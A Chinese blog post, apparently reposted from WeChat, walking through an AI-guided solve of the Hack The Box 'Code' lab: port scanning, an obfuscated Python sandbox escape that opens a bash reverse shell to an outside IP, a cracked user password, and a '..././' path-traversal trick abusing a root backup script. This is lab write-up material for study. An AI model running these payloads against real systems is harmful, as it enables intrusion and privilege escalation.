一次纯AI指导下的HTB打靶记录

admin 2025年4月23日00:37:29评论9 views字数 2242阅读7分28秒阅读模式

前言

该文章是为了给框架做测试用的。

项目:https://github.com/trtyr/Google_Search_Subdomain_Extractor

测试目标为 Hack The Box 靶场 Code:https://app.hackthebox.com/machines/Code

一次纯AI指导下的HTB打靶记录

WP

它首先发现了开发了 22 和 5000 端口

一次纯AI指导下的HTB打靶记录

然后它进行了 dirsearch 扫描,得到一些目录

一次纯AI指导下的HTB打靶记录

进去是一个可以执行 python 命令的界面。

一次纯AI指导下的HTB打靶记录

准备反弹 shell,开启一个监听端口

一次纯AI指导下的HTB打靶记录

然后开始绕过,再经过一段长时间的探索后,得到如下命令

getattr(globals()['sys'].modules[chr(111)+chr(115)], chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109))("bash -c 'bash -i >& /dev/tcp/10.10.16.33/9000 0>&1'")
一次纯AI指导下的HTB打靶记录

成功反弹 Shell

一次纯AI指导下的HTB打靶记录

获取 user 的 flag

一次纯AI指导下的HTB打靶记录

然后通过计划任务,找到两个非常可疑的文件:code_home_martin_cronjob_2025_April.tar.bz2 和 code_home_martin_crontrap_2025_April.tar.bz2 它们是 .tar.bz2 压缩包,所有者是 root,并且所有人可读。文件名暗示它们和用户 martin 的代码或 cron 任务有关

一次纯AI指导下的HTB打靶记录

code_home_martin_cronjob_2025_April.tar.bz2 解压后得到了一个文件 home/martin/cronjob/rootmerootme 文件的内容是:* * * * * root cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash

code_home_martin_crontrap_2025_April.tar.bz2 解压后得到了一个符号链接 home/martin/crontrap/evilcron,它指向 /etc/cron.d/

然后在 app.py 的源码里找到了 database

读取数据库得到信息 `3de6f30c4a09c27fc71932bfc68474be``

一次纯AI指导下的HTB打靶记录

经过解密得到 martin 用户的密码 nafeelswordsmaster

一次纯AI指导下的HTB打靶记录

成功通过 SSH 登录 martin 用户

一次纯AI指导下的HTB打靶记录

然后发现 martin 用户可以以 root 执行 /usr/bin/backy.sh 这个脚本

一次纯AI指导下的HTB打靶记录
#!/bin/bashif [[ $# -ne 1 ]]; then    /usr/bin/echo "Usage: $0 <task.json>"    exit 1fijson_file="$1"if [[ ! -f "$json_file" ]]; then    /usr/bin/echo "Error: File '$json_file' not found."    exit 1fiallowed_paths=("/var/" "/home/")updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\.\./"; ""))' "$json_file")/usr/bin/echo "$updated_json" "$json_file"directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')is_allowed_path() {    local path="$1"    for allowed_path in "${allowed_paths[@]}"; do        if [[ "$path" == $allowed_path* ]]; then            return 0        fi    done    return 1}for dir in $directories_to_archive; do    if ! is_allowed_path "$dir"; then        /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."        exit 1    fidone/usr/bin/backy "$json_file"

这个脚本是可以将指定文件夹打包备份到指定文件夹下。

一次纯AI指导下的HTB打靶记录

因为模型问题,开始犯病

一次纯AI指导下的HTB打靶记录

找到一个 json 模板

{    "destination": "/home/martin/backups/",    "multiprocessing": true,    "verbose_log": false,    "directories_to_archive": [        "/home/app-production/app"    ],    "exclude": [        ".*"    ]}
一次纯AI指导下的HTB打靶记录

根据模板构建请求

{    "destination": "/home/martin/backups/",    "multiprocessing": true,    "verbose_log": false,    "directories_to_archive": [        "/home/..././root"    ],    "exclude": [        ".*"    ]}

成功

一次纯AI指导下的HTB打靶记录

解压得到 flag

一次纯AI指导下的HTB打靶记录
一次纯AI指导下的HTB打靶记录

全过程

一次纯AI指导下的HTB打靶记录
一次纯AI指导下的HTB打靶记录

原文始发于微信公众号(隅见录):一次纯AI指导下的HTB打靶记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日00:37:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次纯AI指导下的HTB打靶记录https://cn-sec.com/archives/3984220.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息